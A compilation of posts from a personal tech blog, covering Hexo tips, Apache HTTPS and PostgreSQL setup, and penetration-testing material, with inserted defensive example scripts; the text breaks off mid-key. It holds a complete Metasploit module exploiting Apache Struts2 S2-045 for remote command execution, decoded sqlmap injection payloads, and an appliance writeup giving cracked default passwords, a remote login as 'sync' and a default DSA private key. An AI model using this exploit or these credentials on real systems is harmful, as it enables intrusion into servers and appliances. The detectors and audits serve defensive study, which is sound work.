0x00 Create a new post/page

~# hexo new "Post Title"
~# hexo new page "Download"

0x01 Put code blocks in your post

Use the codeblock and endcodeblock tags:

{% codeblock lang:javascript %}
alert('Hello World!');
{% endcodeblock %}

Or just use three backquotes

\`\`\`[language] [title] [url] [link text]
code snippet
\`\`\`
#remove the \ before `

Images

{% img [class names] /path/to/image [width] [height] [title text [alt text]] %}

Links

{% link text url [external] [title] %}

0x03 Organize your post resources

In _config.yml, set post_asset_folder to true:

post_asset_folder: true

Then your _posts directory may look like this:

root@debian:~/chorder.net/source# tree _posts/
_posts/
├── hello-world
│   └── 20180510.jpg
├── hello-world.md
├── hexo-start-up
└── hexo-start-up.md

2 directories, 3 files

You can directly include images from the resource directory:

{% asset_img xxx.jpg ALT TITLE %}

0x04 Organize your post categories / tags

You may want to organize your posts into different categories and tags.
First, define the category and tag directories in _config.yml. The defaults look like this:

# Directory
source_dir: source
public_dir: public
tag_dir: tags
archive_dir: archives
category_dir: categories

Then you can generate new pages to navigate the posts:

~# hexo new page "categories"
~# hexo new page "tags"

After that, the tags and categories directories will be created in source:

root@debian:~/chorder.net/source# tree
.
├── categories
│   └── index.md
├── _posts
│   ├── hello-world
│   │   └── 20180510.jpg
│   ├── hello-world.md
│   ├── hexo-start-up
│   └── hexo-start-up.md
└── tags
    └── index.md

5 directories, 5 files

The next time you create a new post, you can declare its category and tags
at the head of the post's markdown file, like this:

---
title: 10 basic operations of Hexo
date: 2018-05-17 17:05:24
categories: default
tags: default
---

The tag and category archives will be shown on the site automatically.

0x05 Publish pages on a simple local server

In your hexo directory, run

~# npm install hexo-server --save

Then start the server:

~# hexo server -p PORT

Or, if you want to publish static pages as in a production environment, first generate the static files:

~# hexo generate

Then start the server in static mode; it will only serve the pages included in the public directory:

~# hexo server -s

0x06 Directly include code from resource

{% include_code [title] [lang:language] path/to/file %}

0x07 Insert a video from youtube / vimeo

{% youtube video_id %}
{% vimeo video_id %}

0x08 Quote an article / resource

# article
{% post_path slug %}
{% post_link slug [title] %}

# resource
{% asset_path slug %}
{% asset_img slug [title] %}
{% asset_link slug [title] %}

0x09 Sitemap & robots.txt

To optimize your site for better SEO, make sure you have created a sitemap:

#for google sitemap, install this package
npm install hexo-generator-sitemap --save
#for baidu(China) sitemap, install this package
npm install hexo-generator-baidu-sitemap --save

After that, tell the crawlers what you have done: write this in your robots.txt and save it in the source directory:

Sitemap: http://YOUR DOMAIN/sitemap.xml
Sitemap: http://YOUR DOMAIN/baidusitemap.xml

My robots.txt as an example:

User-agent: *
Allow: /
Allow: /archives/
Allow: /categories/
Allow: /tags/
Sitemap: https://chorder.net/sitemap.xml
Sitemap: https://chorder.net/baidusitemap.xml

You can see both above at:

Sitemap Baidu Sitemap robots.txt

Welcome to chorder.net, which is…

Somewhere for coding.

loop do
  puts "hello visitor"
end

Somewhere for learning.

Talk is cheap, show me the code.

Linus Benedict Torvalds

Somewhere for sharing.

A new hexo blog, themed by alpha-dust(Jonathan Klughertz)

Somewhere for me.

A New Beginning.

by Chorder, May 10, 2018.

Put it in your MSFPATH/modules/exploits/multi/http/ directory as
struts2_s2045_rce.rb:

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
      'Description' => %q{
        It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd By Nike.Zheng.
      },
      'Author' => [ 'MSF Module: Chorder(http://chorder.net)'],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2017-5638']
        ],
      'Privileged' => true,
      'Platform' => %w{ linux win },
      'Arch' => 'x86',
      'DefaultOptions' =>{
        'CMD' => 'whoami'
      },
      'Targets' =>
        [
          ['Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win',
              'CmdStagerFlavor' => 'tftp'
            }
          ],
          ['Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Mar 06 2017'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2.action', ""]),
        OptString.new('CMD', [ true, 'Execute this command instead of using command stager', "" ])
      ], self.class)
  end

  def execute_command(cmd, opts = {})
    uri = normalize_uri( datastore['URI'] )
    headers ={
"Content-Type"=>"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    }
    data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
    print_status("Target URI: #{uri}")
    print_status("Attempting to execute: #{cmd}")

    resp = send_request_raw({
      'host' => rhost,
      'port' => rport,
      'uri' => uri,
      'version' => '1.1',
      'method' => 'POST',
      'headers' => headers,
      'data' => data,
    }, 5)
    print_status( resp.body )
  end

  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing Command...")
      execute_command(datastore['CMD'])
      return
    end
    handler
  end

end
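
The defender's side of the same bug, as an added example that is not part of the original post: the module above carries its OGNL expression in the Content-Type header, so a request filter or log rule can flag any Content-Type that contains OGNL markers or is not a well-formed media type. The function names and the sample requests are constructed for illustration.

```python
import re

# Markers of OGNL evaluation; none of them can occur in a legitimate media type.
OGNL_MARKERS = re.compile(r"[%$]\{|#_memberAccess|#context|@java\.lang\.", re.I)
# type/subtype plus optional ;name=value parameters (RFC 7231 shape).
MEDIA_TYPE = re.compile(
    r'^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+'
    r'(\s*;\s*[A-Za-z0-9_.-]+=("[^"]*"|[^;\s"]+))*\s*$'
)


def classify_content_type(value):
    """Return 'ognl', 'malformed' or 'ok' for one Content-Type header value."""
    if OGNL_MARKERS.search(value):
        return "ognl"
    if not MEDIA_TYPE.match(value):
        return "malformed"
    return "ok"


def scan_request(raw):
    """Classify every Content-Type header in the header block of a raw HTTP request."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    verdicts = []
    for line in lines[1:]:  # lines[0] is the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-type":
            verdicts.append(classify_content_type(value.strip()))
    return verdicts


# Constructed sample requests. The OGNL one is a harmless fragment, not a payload.
SAMPLE_REQUESTS = {
    "upload": "POST /struts2.action HTTP/1.1\r\nHost: app.example\r\n"
              "Content-Type: multipart/form-data; boundary=----1529557865\r\n\r\n",
    "api": "POST /struts2.action HTTP/1.1\r\nHost: app.example\r\n"
           "content-type: application/json; charset=utf-8\r\n\r\n{}",
    "ognl": "POST /struts2.action HTTP/1.1\r\nHost: app.example\r\n"
            "Content-Type: %{(#nike='multipart/form-data')}\r\n\r\n",
    "broken": "POST /struts2.action HTTP/1.1\r\nHost: app.example\r\n"
              "Content-Type: multipart/form-data boundary\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        print(label, scan_request(raw))
```

Header filtering is a stopgap; CVE-2017-5638 is fixed by upgrading Struts to 2.3.32 or 2.5.10.1 and later.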

Error details:

ruby-2.3.3 - #compiling.......................................................................-
Error running '__rvm_make -j4',
showing last 15 lines of /usr/local/rvm/log/1488041042_ruby-2.3.3/make.log
exts.mk:210: recipe for target 'ext/openssl/all' failed
make[1]: *** [ext/openssl/all] Error 2
make[1]: *** Waiting for unfinished jobs....
installing default nkf libraries
compiling objspace_dump.c
linking shared-object json/ext/generator.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/json/generator'
linking shared-object objspace.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/objspace'
linking shared-object nkf.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/nkf'
make[1]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3'
uncommon.mk:203: recipe for target 'build-ext' failed
make: *** [build-ext] Error 2
++ return 2
There has been an error while running make. Halting the installation.

Checking /usr/local/rvm/log/1488041042_ruby-2.3.3/make.log shows that the failure is caused by an OpenSSL version that is too old.

Solution:
Step 1: first install the openssl package for rvm:

rvm pkg install openssl

Step 2: compile and install ruby, specifying the openssl directory (mine is /usr/local/rvm/usr/):

rvm install ruby-2.3.3 --with-openssl-dir=/usr/local/rvm/usr/

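PostgreSQL does not actually have to be reached through a port.
One of its configuration options lets you run PostgreSQL with no port open at all, communicating only over a Unix socket.

For the details, see the blog of a well-known Chinese PostgreSQL expert:

https://github.com/digoal/blog/blob/master/201701/20170111_01.md

That is, in postgresql.conf, set the listening host listen_addresses to empty, and communication works without opening a port.
If your unix_socket_directories option points to /tmp, then once postgresql is running there will be a file named ".s.PGSQL.5432" under /tmp (you can see it with ls -a /tmp).
If, after configuring listen_addresses and unix_socket_directories, you restart the postgresql service and the socket file exists under /tmp, the configuration is in place.
Then, in metasploit's database.yml file, set host to /tmp; the username and password can be anything, and the database name is metasploit's database.
Next, edit postgresql's "pg_hba.conf" file
and add local all all trust to it,
which marks every request from the local Unix domain as trusted. You can then use postgresql from metasploit without opening a port.

For safety, you can also set unix_socket_permissions to 0770 in
postgresql.conf, which keeps unrelated users from abusing this Unix socket.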
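
A check for the combination described above, as an added example that is not part of the original post: with a trust rule on local connections, the socket file mode is the only access control left, so the audit flags a trust rule whose socket is still usable by every local user. The function names and the sample configuration text are constructed; the defaults assumed for unset options are PostgreSQL's documented ones (listen_addresses = localhost, unix_socket_permissions = 0777).

```python
import re

# Documented PostgreSQL defaults for options the file leaves unset.
DEFAULTS = {"listen_addresses": "localhost", "unix_socket_permissions": "0777"}


def parse_conf(text):
    """Parse postgresql.conf 'name = value' lines; later lines win, '#' starts a comment."""
    settings = dict(DEFAULTS)
    for line in text.splitlines():
        m = re.match(r"\s*([a-z0-9_.]+)\s*=?\s*('(?:[^']|'')*'|[^#\s]+)", line)
        if m:
            settings[m.group(1)] = m.group(2).strip("'")
    return settings


def trust_local_rules(hba_text):
    """pg_hba.conf records of type 'local' that use the trust method."""
    rules = []
    for line in hba_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 4 and fields[0] == "local" and fields[3] == "trust":
            rules.append(fields)
    return rules


def audit(conf_text, hba_text):
    """Return finding codes for the socket-only setup described in the post."""
    settings = parse_conf(conf_text)
    findings = []
    if settings["listen_addresses"] != "":
        findings.append("tcp-listening")  # a TCP port is still open
    mode = int(settings["unix_socket_permissions"], 8)
    if trust_local_rules(hba_text) and mode & 0o007:
        # Any local account can connect as any database user without a password.
        findings.append("trust-socket-open-to-all-users")
    return findings


# Constructed sample configuration: the weak form and the corrected form.
WEAK_CONF = "listen_addresses = ''\nunix_socket_directories = '/tmp'\n"
HARDENED_CONF = WEAK_CONF + "unix_socket_permissions = 0770   # owner and group only\n"
HBA = "# TYPE  DATABASE  USER  METHOD\nlocal all all trust\n"

if __name__ == "__main__":
    print("weak:", audit(WEAK_CONF, HBA))
    print("hardened:", audit(HARDENED_CONF, HBA))
```

With mode 0770 the group that owns the socket decides who may connect, so pair it with unix_socket_group set to a group that contains only the intended accounts.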

I do not know where the original article came from. If you are the author, please message me privately so I can add a link to the source.

Preface

A record of commands and methods for triaging common logs, kept as a wiki; additions are welcome (Markdown syntax).

Common commands

  1. Find a keyword and count the matching lines
    cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l
  2. Delete the lines that contain a matching string
    sed -i '/Indy Library/d' 2015_7_25_test_access.log
  3. Search for a keyword across all logs
    find ./ -name "*.log" |xargs grep "sqlmap" |wc -l
  4. Extract a particular field (such as an id), then sort and count
    cat cszl988.log | awk '{print $1}' | awk -F : '{print $2}' | sort -u | wc -l
  5. Match content with a regular expression (for example, extract IPs)
    grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
  6. Deduplicate and count occurrences
    tail 3.log | awk '{print $7}' | sort | uniq -c
  7. Batch-extract packets (from full traffic captures) and filter the data
    #!/bin/bash
    # Parse every capture file in the directory given as $1 and drop common header lines
    for file in "$1"/*
    do
        parse_pcap -vvb "$file" | grep -v -e "Host:" -e "Cookie:" -e "User-Agent:" -e "Accept:" -e "Accept-Language:" -e "Accept-Encoding:" -e "Connection:" -e "Content-Type:" -e "Content-Length" -e "Server"
    done
  8. URL decoding
    cat luban.log | grep sqlmap | awk '{print $7}' | xargs -n 1 python3 -c 'import sys, urllib.parse; print(urllib.parse.unquote(sys.argv[1]))'
  9. Additions welcome...

Demonstration: triaging the injection logs of site xxxx

  • Count all sqlmap injection records
    [root@pentest temp]# cat luban.log | grep sqlmap | wc -l
    1241
  • Preview a few URLs
    cat luban.log | grep sqlmap | awk '{print $7}' | more
    /news.php?id=771%28.%28%22%29.%27%29%29%27&fid=168
    /news.php?id=771%27IddP%3C%27%22%3EvCBw&fid=168
    /news.php?id=771%29%20AND%201148%3D8887%20AND%20%288975%3D8975&fid=168
    /news.php?id=771%29%20AND%208790%3D8790%20AND%20%287928%3D7928&fid=168
    /news.php?id=771%20AND%204294%3D9647&fid=168
    /news.php?id=771%20AND%208790%3D8790&fid=168
    /news.php?id=771%27%29%20AND%205983%3D7073%20AND%20%28%27UwRr%27%3D%27UwRr&fid=168
    /news.php?id=771%27%29%20AND%208790%3D8790%20AND%20%28%27hwaT%27%3D%27hwaT&fid=168
    /news.php?id=771%27%20AND%206578%3D7565%20AND%20%27EoTZ%27%3D%27EoTZ&fid=168
    /news.php?id=771%27%20AND%208790%3D8790%20AND%20%27lBdL%27%3D%27lBdL&fid=168
    /news.php?id=771%25%27%20AND%205177%3D1107%20AND%20%27%25%27%3D%27&fid=168
    /news.php?id=771%25%27%20AND%208790%3D8790%20AND%20%27%25%27%3D%27&fid=168
  • URL-decode them for easier reading
    cat luban.log | grep sqlmap | awk '{print $7}' | xargs -n 1 python3 -c 'import sys, urllib.parse; print(urllib.parse.unquote(sys.argv[1]))'
    /news.php?id=771&fid=168
    /news.php?id=771&fid=168 AND ASCII(SUBSTRING((SELECT DISTINCT(COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32)))) FROM pg_tables OFFSET 1 LIMIT 1)::text FROM 3 FOR 1))>97
    /news.php?id=771&fid=168 UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(106)||CHR(120)||CHR(113))||(CHR(103)||CHR(75)||CHR(78)||CHR(87)||CHR(76)||CHR(74)||CHR(110)||CHR(115)||CHR(100)||CHR(85))||(CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(106)||CHR(120)||CHR(113))||(CHR(113)||CHR(71)||CHR(74)||CHR(82)||CHR(101)||CHR(120)||CHR(69)||CHR(112)||CHR(117)||CHR(79))||(CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
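
The pipeline used above (filter on "sqlmap", take field 7, URL-decode, count) written as one script, as an added example that is not part of the original article. It goes one step further and also reports requests that carry SQL syntax without the keyword, since the User-Agent is chosen by the client and a keyword grep misses a scanner that hides it. It assumes the combined access-log format, where field 7 is the request path; the function names and log lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# SQL fragments that become visible once a parameter value is decoded.
SQLI = re.compile(r"union\s+(all\s+)?select|\b(and|or)\s+\d+=\d+", re.I)


def tampered_params(path):
    """Names of query parameters whose decoded value carries SQL syntax or a quote."""
    return [name for name, value in parse_qsl(urlsplit(path).query)
            if SQLI.search(value) or "'" in value or '"' in value]


def triage(lines, keyword="sqlmap"):
    """Count keyword hits per client, decode their paths, and list what the keyword missed."""
    by_ip, params, decoded, missed = Counter(), Counter(), [], []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        names = tampered_params(m["path"])
        if keyword in line:  # same match as grep "sqlmap"
            by_ip[m["ip"]] += 1
            decoded.append(unquote(m["path"]))
            params.update(names)
        elif names:
            missed.append(m["ip"])  # injection syntax, but no keyword in the line
    return {"hits": len(decoded), "by_ip": by_ip, "params": params,
            "decoded": decoded, "missed": missed}


# Constructed log lines (documentation IP ranges), modelled on the URLs shown above.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jul/2015:10:00:01 +0800] "GET /news.php?id=771%20AND%208790%3D8790&fid=168 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '192.0.2.10 - - [25/Jul/2015:10:00:02 +0800] "GET /news.php?id=771%27%20AND%206578%3D7565%20AND%20%27EoTZ%27%3D%27EoTZ&fid=168 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '198.51.100.7 - - [25/Jul/2015:10:00:03 +0800] "GET /news.php?id=771&fid=168 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Jul/2015:10:00:04 +0800] "GET /index.php HTTP/1.1" 200 1024 "-" "Indy Library"',
    '203.0.113.5 - - [25/Jul/2015:10:00:05 +0800] "GET /news.php?id=771%20UNION%20ALL%20SELECT%20NULL--&fid=168 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    print(report["hits"], dict(report["by_ip"]), dict(report["params"]), report["missed"])
    for url in report["decoded"]:
        print(url)
```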

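https://startssl.com offers free, trusted https certificates. Here is a brief walk-through of the configuration.
First, the server needs openssl and Apache's mod_ssl.so module installed, and the module must be enabled in httpd.conf.
Once that is done, you can use openssl to generate your own certificate.
There is some background you need to know first.
For an https service as a whole, you need to understand what these files are for:

server.key The server's private key
server.crt The server's certificate file
server.csr The server's certificate request file
root.crt   The root certificate

These files are generated as follows.

First run

openssl req -new -nodes -keyout chorder.net.key -out chorder.net.csr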

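This generates the server private key and the server certificate request file; along the way you are asked for a lot of information about the certificate, and for a password.
When this step completes there are two files, chorder.net.key and chorder.net.csr.
Now register an account on the startssl site and submit the .csr file you generated, so that startssl issues a
server certificate and a root certificate for you.
Copy the two certificates ending in .crt to /etc/pki/tls/certs/ on the server, and copy the .key and .csr files to /etc/pki/tls/private/. (This applies to CentOS servers only; for other servers, please look it up yourself.)
You also need to make cert.pem under /etc/pki/tls/ (create it if it does not exist) a link pointing to /etc/pki/tls/certs/root.crt,
so that Firefox does not report the SEC_ERROR_UNKNOWN_ISSUER error when visiting the site.
This cert.pem is the certificate chain: clients only consider your certificate trusted when your server certificate is part of the startssl certificate chain.

Finally, modify two files.

1. /etc/httpd/conf.d/ssl.conf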

Change the following in that file:

Specify the server certificate

SSLCertificateFile /etc/pki/tls/certs/chorder.net.crt

Specify the server private key

SSLCertificateKeyFile /etc/pki/tls/private/chorder.net.key

Specify the server certificate chain

SSLCertificateChainFile /etc/pki/tls/certs/root-bundle.crt

2. /etc/httpd/conf/httpd.conf

Create a configuration for your host (a virtual host in my case).

My configuration is as follows:

NameVirtualHost *:443
<VirtualHost *:443>
    SSLEngine on
    SSLCertificateFile /etc/pki/tls/certs/chorder.net.crt
    SSLCertificateKeyFile /etc/pki/tls/private/chorder.net.key
    SSLCertificateChainFile /etc/pki/tls/cert.pem
    ServerName chorder.net
    ServerAdmin ×××××
    DocumentRoot ×××××
    ErrorLog ×××××
    CustomLog ×××××
</VirtualHost>

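In effect it is just a few extra lines in the http configuration file.
Once this is configured, restart the service and you are done.
Also, if you want visits to your domain to be redirected straight to the https port, you can write a bit of js to do the redirect; if writing code
feels like too much trouble, add these two lines to the .htaccess file in the root directory to redirect automatically:

RewriteCond %{SERVER_PORT} !^443$
RewriteRule (.*) https://%{SERVER_NAME}/$1 [R]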

This makes 443 the default port and rewrites every http request to https.

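This is a fairly old vulnerability, but to this day quite a few vendors are still running this version of the appliance. I have also run into it during penetration tests.
Reference: https://www.exploit-db.com/exploits/32369/

Affected products: Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances

Default users and passwords

The /etc/master.passwd file of vxAG 9.2.0.34 and vAPV 8.3.2.17 contains default users and passwords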

$ cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:$1$9QkJT4Y5$lF2BPaSI2kPlcrqz89yZv0:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
test:$1$UtEw8DNY$te4MRasnXgETxWOZ9Z1o10:1002:1002::0:0:test:/export/test:/bin/tcsh
sync:$1$bmfGRJPh$lWnesbn8M8xZNo3uaqfEd1:1005:0::0:0:sync:/export/sync:/bin/sh
recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery
mfg:$1$i8SV4bKc$lNMeb8Yow.p.cZvWxt1mO1:1013:1010::0:0:mfg:/export/mfg:/bin/tcsh
arraydb:*:1015:0::0:0:User &:/home/arraydb:/bin/sh
array::1016:1011::0:0:User &:/:/ca/bin/ca_shell

Cracking the hashes yields the following users and passwords:

User: mfg Password: mfg
User: sync Password: click1

The test and root users could not be cracked.

The sync user can log in remotely by default:

$ssh sync@192.168.2.55 /bin/sh
sync@192.168.2.55's password:
$id
uid=1005(sync) gid=0(wheel) groups=0(wheel)
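
An audit of the weaknesses visible in that listing, as an added example that is not part of the original post: it parses the 10-field FreeBSD master.passwd layout (name:password:uid:gid:class:change:expire:gecos:home:shell) and flags empty password fields, MD5-crypt hashes, extra UID 0 accounts and login-capable accounts in gid 0. The account names follow the listing above, the hashes are constructed placeholders, and the function names are hypothetical.

```python
FIELDS = ("name", "password", "uid", "gid", "class", "change",
          "expire", "gecos", "home", "shell")


def parse_master_passwd(text):
    """Parse master.passwd text into dicts, skipping comments and damaged lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            continue  # wrapped or truncated record; skip rather than guess
        entry = dict(zip(FIELDS, parts))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries


def audit(entries):
    """Return (account, finding) pairs for the weaknesses described in the post."""
    findings = []
    for e in entries:
        pw, shell = e["password"], e["shell"]
        # '*' locks password login; a nologin shell refuses interactive sessions.
        can_login = not pw.startswith("*") and not shell.endswith("nologin")
        if pw == "":
            findings.append((e["name"], "empty password field"))
        elif pw.startswith("$1$"):
            findings.append((e["name"], "MD5-crypt hash"))
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
        if can_login and e["gid"] == 0 and e["uid"] != 0:
            findings.append((e["name"], "login account in gid 0 (wheel)"))
    return findings


# Constructed sample: names and ids from the listing, hashes are placeholders.
SAMPLE = """\
# constructed sample, not a real password database
root:$1$constructed$AAAAAAAAAAAAAAAAAAAAAA:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
sync:$1$constructed$BBBBBBBBBBBBBBBBBBBBBB:1005:0::0:0:sync:/export/sync:/bin/sh
recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery
array::1016:1011::0:0:User &:/:/ca/bin/ca_shell
"""

if __name__ == "__main__":
    for account, finding in audit(parse_master_passwd(SAMPLE)):
        print(f"{account}: {finding}")
```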

SSH private key

The sync user uses a login private key located at "~/.ssh/id_dsa":

$ cat id_dsa
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
+sqSEhA35Le2kC4Y1/A=
-----END DSA PRIVATE KEY-----

The following files are located in the ~/.ssh directory:

$ cat authorized_keys
1024 35
117781646131320088945310945996213112717535690524599971400605193647439008360689916421327587459429042579662784434303538942896683338584760112042194838342054595473085094045804963620754645364924583113650482968246287214031112796524662479539236259838315876244144983122361617319660444993650437402628793785173700484401
sync@AN

$ cat authorized_keys2
ssh-dss
AAAAB3NzaC1kc3MAAACBAJTDsX+8olPZeyr58g9XE0L8PKT5030NZBPlE7np4hBqx36HoWarWq1Csn8M57dWN9StKbs03k2ggY6sYJK5AW2EWar70um3pYjKQHiZq7mITmitsozFN/K7wu2e2iKRgquUwH5SuYoOJ29n7uhaILXiKZP4/H/dDudqPRSY6tJPAAAAFQDtuWH90mDbU2L/Ms2lfl/cja/wHwAAAIAMBwSHZt2ysOHCFe1WLUvdwVDHUqk3QHTskuuAnMlwMtSvCaUxSatdHahsMZ9VCHjoQUx6j+TcgRLDbMlRLnwUlb6wpniehLBFk+qakGcREqks5NxYzFTJXwROzP72jPvVgQyOZHWq81gCild/ljL7hmrduCqYwxDIz4o7U92UKQAAAIBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQOC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBg==
sync@AN

With this, the private key can be used to get into the system:

Save the id_dsa private key below to a file named "synckey":

cat > ~/synckey << EOF
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
